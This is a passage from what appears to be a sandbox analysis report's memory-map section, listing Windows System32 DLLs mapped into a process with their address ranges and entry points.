(normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1123 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1124 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1125 start_va = 0x7ffb1a5b0000 end_va = 0x7ffb1a5d7fff monitored = 0 entry_point = 0x7ffb1a5befc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1126 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1127 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1128 start_va = 0x7ffb1aa70000 end_va = 0x7ffb1aa85fff monitored = 0 entry_point = 0x7ffb1aa71d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1129 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1130 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1131 start_va = 0x7ffb1d1d0000 end_va = 0x7ffb1d1dffff monitored = 0 entry_point = 0x7ffb1d1d1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1132 start_va = 0x7ffb1d1e0000 end_va = 0x7ffb1d1e8fff monitored = 0 entry_point = 0x7ffb1d1e1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1133 start_va = 0x7ffb1d1f0000 end_va = 0x7ffb1d21cfff monitored = 0 entry_point = 0x7ffb1d1f2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1134 start_va = 0x7ffb1d220000 end_va = 0x7ffb1d271fff monitored = 0 entry_point = 0x7ffb1d2238e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1135 start_va = 0x7ffb1d3f0000 end_va = 0x7ffb1d40afff monitored = 0 entry_point = 0x7ffb1d3f1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1136 start_va = 0x7ffb1d700000 end_va = 0x7ffb1d70dfff monitored = 0 entry_point = 0x7ffb1d701460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1137 start_va = 0x7ffb1d8c0000 end_va = 0x7ffb1d959fff monitored = 0 entry_point = 0x7ffb1d8dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1138 start_va = 0x7ffb1d960000 end_va = 0x7ffb1d974fff monitored = 0 entry_point = 0x7ffb1d963460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1139 start_va = 0x7ffb1da70000 end_va = 0x7ffb1dab0fff monitored = 0 entry_point = 0x7ffb1da74840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1140 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1141 start_va = 0x7ffb1dc60000 end_va = 0x7ffb1dd1ffff monitored = 0 entry_point = 0x7ffb1dc8fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1142 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1143 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1144 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1145 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1146 start_va = 0x7ffb1ddb0000 end_va = 0x7ffb1de95fff monitored = 0 entry_point = 0x7ffb1ddccf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1147 start_va = 0x7ffb1dfc0000 end_va = 0x7ffb1dfcafff monitored = 0 entry_point = 0x7ffb1dfc1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1148 start_va = 0x7ffb1dff0000 end_va = 0x7ffb1e01dfff monitored = 0 entry_point = 0x7ffb1dff7550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1149 start_va = 0x7ffb1e020000 end_va = 0x7ffb1e02cfff monitored = 0 entry_point = 0x7ffb1e022ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1150 start_va = 0x7ffb1e030000 end_va = 0x7ffb1e05efff monitored = 0 entry_point = 0x7ffb1e038910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1151 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1152 start_va = 0x7ffb1e130000 end_va = 0x7ffb1e13ffff monitored = 0 entry_point = 0x7ffb1e132c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1153 start_va = 0x7ffb1e140000 end_va = 0x7ffb1e153fff monitored = 0 entry_point = 0x7ffb1e142d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1154 start_va = 0x7ffb1e440000 end_va = 0x7ffb1e4d2fff monitored = 0 entry_point = 0x7ffb1e449680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1155 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1156 start_va = 0x7ffb1e820000 end_va = 0x7ffb1e88dfff monitored = 0 entry_point = 0x7ffb1e827f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1157 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1158 start_va = 0x7ffb1e8b0000 end_va = 0x7ffb1e8f0fff monitored = 0 entry_point = 0x7ffb1e8c7eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1159 start_va = 0x7ffb1e900000 end_va = 0x7ffb1e9fbfff monitored = 0 entry_point = 0x7ffb1e936df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1160 start_va = 0x7ffb1ea00000 end_va = 0x7ffb1eaadfff monitored = 0 entry_point = 0x7ffb1ea180c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1161 start_va = 0x7ffb1eab0000 end_va = 0x7ffb1eac1fff monitored = 0 entry_point = 0x7ffb1eab9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1162 start_va = 0x7ffb1ead0000 end_va = 0x7ffb1eb80fff monitored = 0 entry_point = 0x7ffb1eb488b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1163 start_va = 0x7ffb1eb90000 end_va = 0x7ffb1ebb4fff monitored = 0 entry_point = 0x7ffb1eba2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1164 start_va = 0x7ffb1ebc0000 end_va = 0x7ffb1ebd0fff monitored = 0 entry_point = 0x7ffb1ebc7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1165 start_va = 0x7ffb1ebe0000 end_va = 0x7ffb1ebf9fff monitored = 0 entry_point = 0x7ffb1ebe2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1166 start_va = 0x7ffb1ec00000 end_va = 0x7ffb1ec0bfff monitored = 0 entry_point = 0x7ffb1ec014d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1167 start_va = 0x7ffb1ec10000 end_va = 0x7ffb1ec64fff monitored = 0 entry_point = 0x7ffb1ec13fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1168 start_va = 0x7ffb1ec70000 end_va = 0x7ffb1eca6fff monitored = 0 entry_point = 0x7ffb1ec76020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1169 start_va = 0x7ffb1ecb0000 end_va = 0x7ffb1eccffff monitored = 0 entry_point = 0x7ffb1ecb39a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1170 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1171 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1172 start_va = 0x7ffb208d0000 end_va = 0x7ffb209ddfff monitored = 0 entry_point = 0x7ffb2091eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1173 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1174 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1175 start_va = 0x7ffb21110000 end_va = 0x7ffb21170fff monitored = 0 entry_point = 0x7ffb21114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1176 start_va = 0x7ffb21180000 end_va = 0x7ffb212fbfff monitored = 0 entry_point = 0x7ffb211d1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1177 start_va = 0x7ffb21300000 end_va = 0x7ffb2130afff monitored = 0 entry_point = 0x7ffb21301770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1178 start_va = 0x7ffb21310000 end_va = 0x7ffb21326fff monitored = 0 entry_point = 0x7ffb21315630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1179 start_va = 0x7ffb21330000 end_va = 0x7ffb2136dfff monitored = 0 entry_point = 0x7ffb2133a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1180 start_va = 0x7ffb21370000 end_va = 0x7ffb21396fff monitored = 0 entry_point = 0x7ffb21373bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1181 start_va = 0x7ffb213a0000 end_va = 0x7ffb213f4fff monitored = 0 entry_point = 0x7ffb213afc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1182 start_va = 0x7ffb21400000 end_va = 0x7ffb21412fff monitored = 0 entry_point = 0x7ffb214057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1183 start_va = 0x7ffb21420000 end_va = 0x7ffb2142bfff monitored = 0 entry_point = 0x7ffb21422830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1184 start_va = 0x7ffb21430000 end_va = 0x7ffb21439fff monitored = 0 entry_point = 0x7ffb21431660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1185 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1186 start_va = 0x7ffb21460000 end_va = 0x7ffb215acfff monitored = 0 entry_point = 0x7ffb214a3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1187 start_va = 0x7ffb21640000 end_va = 0x7ffb216d1fff monitored = 0 entry_point = 0x7ffb2168a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1188 start_va = 0x7ffb21760000 end_va = 0x7ffb217d9fff monitored = 0 entry_point = 0x7ffb21787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1189 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1190 start_va = 0x7ffb21b50000 end_va = 0x7ffb21b85fff monitored = 0 entry_point = 0x7ffb21b60070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1191 start_va = 0x7ffb22640000 end_va = 0x7ffb22647fff monitored = 0 entry_point = 0x7ffb226413e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1192 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1193 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1194 start_va = 0x7ffb235b0000 end_va = 0x7ffb23616fff monitored = 0 entry_point = 0x7ffb235ce710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1195 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1196 start_va = 0x7ffb23800000 end_va = 0x7ffb2381bfff monitored = 0 entry_point = 0x7ffb238037a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1197 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1198 start_va = 0x7ffb239d0000 end_va = 0x7ffb23a0ffff monitored = 0 entry_point = 0x7ffb239e1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1199 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1200 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1201 start_va = 0x7ffb23c40000 end_va = 0x7ffb23d3ffff monitored = 0 entry_point = 0x7ffb23c80f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1202 start_va = 0x7ffb23dd0000 end_va = 0x7ffb23ddbfff monitored = 0 entry_point = 0x7ffb23dd2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1203 start_va = 0x7ffb23ea0000 end_va = 0x7ffb23ed1fff monitored = 0 entry_point = 0x7ffb23eb2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1204 start_va = 0x7ffb24110000 end_va = 0x7ffb2411bfff monitored = 0 entry_point = 0x7ffb24112790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1205 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1206 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1207 start_va = 0x7ffb24410000 end_va = 0x7ffb24458fff monitored = 0 entry_point = 0x7ffb2441a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1208 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1209 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1210 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1211 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1212 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1213 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1214 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1215 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1216 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1217 start_va = 0x7ffb24c00000 end_va = 0x7ffb24c20fff monitored = 0 entry_point = 0x7ffb24c10250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1218 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1219 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1220 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1221 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1222 start_va = 0x7ffb24f90000 end_va = 0x7ffb24fa8fff monitored = 0 entry_point = 0x7ffb24f95e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1223 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1224 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1225 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1226 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1227 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1228 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1229 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1230 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: 